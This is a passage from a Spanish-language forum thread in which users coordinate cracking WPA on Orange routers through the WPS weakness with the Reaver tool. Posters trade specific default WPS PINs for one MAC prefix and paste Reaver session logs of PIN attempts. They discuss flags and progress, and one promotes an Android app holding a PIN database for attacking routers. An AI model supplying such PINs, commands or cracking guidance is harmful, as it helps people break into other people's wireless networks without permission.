REAVER: Vulnerabilidad de WPA por WPS habilitado

Iniciado por ChimoC, 15 Enero 2012, 02:25 AM

0 Miembros y 15 Visitantes están viendo este tema.

El_Andaluz

Vale de acuerdo voy probar los 3 pines que tu me has dado si lo saco te lo comento por aqui y si no lo saco tambien muchas gracias P4nd3m0n1um. Haber si tengo suerto ;-)

lekaja

Cita de: P4nd3m0n1um en 24 Diciembre 2012, 04:21 AM
PIN:
42866230
47838396
59261842
pues para mi eso pines no me ha servido con las orange 00:19:70  :-[ un salu2

El_Andaluz

lekaja : Tu lo has probado estos pines que ha puesto nuestro compañero P4nd3m0n1um ?  Dime en que porcentaje se te keda cada pin que probastes yo lo voy a intentar aora haber si hay suerte.

P4nd3m0n1um: Tengo el wifilax 4.3 version final voy a probarlo hay escuchame donde me recomiendas que haga la prueba con estos pines en reaver 1.4 o el wpscragui y con que comando me recomiendas mejor para hacerlo con el de  -p verdad para meter el pin .

P4nd3m0n1um

Cita de: elsevi en 24 Diciembre 2012, 14:30 PM
lekaja : Tu lo has probado estos pines que ha puesto nuestro compañero P4nd3m0n1um ?  Dime en que porcentaje se te keda cada pin que probastes yo lo voy a intentar aora haber si hay suerte.

P4nd3m0n1um: Tengo el wifilax 4.3 version final voy a probarlo hay escuchame donde me recomiendas que haga la prueba con estos pines en reaver 1.4 o el wpscragui y con que comando me recomiendas mejor para hacerlo con el de  -p verdad para meter el pin .

tiene que probarlo el elsevi con la mac que puso, mandarle con cualquier reaver.. no creo que sea tan simple pero...

HalconEye

Probando estoy el primer pin de pandemonium,...la asociación es instantánea prácticamente....el M1,M2,M3,M4 es "reconocido" y aceptado por el router....




Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from 00:19:70:YY:XY:YY
  • Associated with 00:19:70:YY:XY:YY (ESSID: Orange-YYYx)
  • 90.91% complete @ 2012-12-25 12:44:55 (0 seconds/pin)
  • 90.91% complete @ 2012-12-25 12:46:14 (0 seconds/pin)
  • 90.92% complete @ 2012-12-25 12:47:14 (232 seconds/pin)
  • 90.93% complete @ 2012-12-25 12:48:06 (142 seconds/pin)
  • 90.93% complete @ 2012-12-25 12:49:02 (170 seconds/pin)
  • 90.93% complete @ 2012-12-25 12:50:13 (205 seconds/pin)
  • 90.95% complete @ 2012-12-25 12:51:25 (120 seconds/pin)
  • 90.95% complete @ 2012-12-25 12:52:21 (134 seconds/pin)
  • 90.95% complete @ 2012-12-25 12:53:16 (148 seconds/pin)
    Estaba sin el -vv....

  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received WSC NACK
  • Sending WSC NACK
  • Trying pin 42866237
    ^C
  • Session saved.

    Ya continuaré experimentando...estoy con la alfa awuso36h desde el salón y no la mejor ubicación para este orange...sólo he probado un pin completo 42866230,directamente me ha pasado al 90,91%.....luego ha seguido probando con el último número del pin hasta estancarse en el 7...

    con el otro pin,después de tirarse un rato con el ,se pasa a probar con el último acabado en 0 y ahí se queda..lo curioso es que da los M1,M2,M3,M4 igual que con el otro pin... :huh:

  • 90.91% complete @ 2012-12-25 13:18:58 (0 seconds/pin)
  • Trying pin 47838390
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
    [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
  • Trying pin 47838390
  • Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
    [!] WARNING: Receive timeout occurred
  • Sending WSC NACK
  • Trying pin 47838390

Todo lo que digan que somos,
lo somos y aún peor.

El_Andaluz

Eso lo que quiere decir es que esta buscando los 4 primeros numeros del pin si te ha lanzado un M4  es por eso pero se te bloqueara y no te dejara seguir a mi se me ha bloqueado al rato y me lanzaba lo mismo que a ti he probado los  3 pines que distes pandemonium y no me valio ninguno tio .

P4nd3m0n1um

@malamadre67: En teoría si estas en 90% es que ya encontraste los primeros 4 dígitos. "4286" Solamente te faltarian 4, que por lo general el ataque no dura mas de 3hs.. pero habría que verlo..

@elsevi: Bien eso esta bien, pues no tendría que ser tan simple..

karlostek

hola,cuando miro lo de la protección wps si esta activado o no me pone 0x04 , eso que quiere decir?que esta activado o no el wps?

P4nd3m0n1um

Cita de: karlostek en 26 Diciembre 2012, 04:11 AM
hola,cuando miro lo de la protección wps si esta activado o no me pone 0x04 , eso que quiere decir?que esta activado o no el wps?

Si el Wash te dice que si, es que tiene.. o WPSpy, WPScan..

P4nd3m0n1um

#849
De paso les dejo el WPSPin:


WPSPin es una aplicación para Android que posee una gran base de datos con pines de WPS que podemos utilizar para atacar routers mediante a Reaver-WPS.

Requerimientos:

* Android 2.3.* o Superior.

Capturas (Samsung Galaxy SII):






Pueden descargarlo desde: https://sourceforge.net/projects/wpspin/